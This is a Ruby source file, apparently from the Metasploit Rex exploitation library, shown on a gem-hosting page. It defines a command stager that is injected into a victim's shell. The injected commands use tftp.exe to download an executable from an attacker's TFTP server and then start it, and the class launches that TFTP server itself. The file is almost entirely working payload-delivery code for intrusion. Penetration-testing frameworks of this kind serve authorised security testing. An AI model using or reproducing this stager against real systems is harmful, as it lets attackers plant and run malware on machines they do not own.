Sha256: 8becafdf04e9454be8316847590ad0514f03e6c030323fadc4c0bc81551e0c2f
Contents?: true
Size: 1.85 KB
Versions: 31
Compression:
Stored size: 1.85 KB
Contents
# -*- coding: binary -*- require 'rex/text' require 'rex/arch' module Rex module Exploitation ### # # This class provides the ability to create a sequence of commands from an executable. # When this sequence is ran via command injection or a shell, the resulting exe will # be written to disk and executed. # # This particular version uses tftp.exe to download a binary from the specified # server. The original file is preserve, not encoded at all, and so this version # is significantly simpler than other methods. # # Requires: tftp.exe, outbound udp connectivity to a tftp server # # Written by Joshua J. Drake # ### class CmdStagerTFTP < CmdStagerBase def initialize(exe) super @payload_exe = Rex::Text.rand_text_alpha(8) + ".exe" end def setup(mod) self.tftp = Rex::Proto::TFTP::Server.new self.tftp.register_file(Rex::Text.rand_text_alphanumeric(8), exe) self.tftp.start mod.add_socket(self.tftp) # Hating myself for doing it... but it's just a first demo end def teardown(mod = nil) self.tftp.stop end # # We override compress commands just to stick in a few extra commands # last second.. # def compress_commands(cmds, opts) # Initiate the download cmds << "tftp -i #{opts[:tftphost]} GET #{opts[:transid]} #{@tempdir + @payload_exe}" # Make it all happen cmds << "start #{@tempdir + @payload_exe}" # Clean up after unless requested not to.. if (not opts[:nodelete]) # XXX: We won't be able to delete the payload while it is running.. end super end # NOTE: We don't use a concatenation operator here since we only have a couple commands. # There really isn't any need to combine them. Also, the ms01_026 exploit depends on # the start command being issued separately so that it can ignore it :) attr_reader :exe attr_reader :payload_exe attr_accessor :tftp end end end
Version data entries
31 entries across 31 versions & 1 rubygems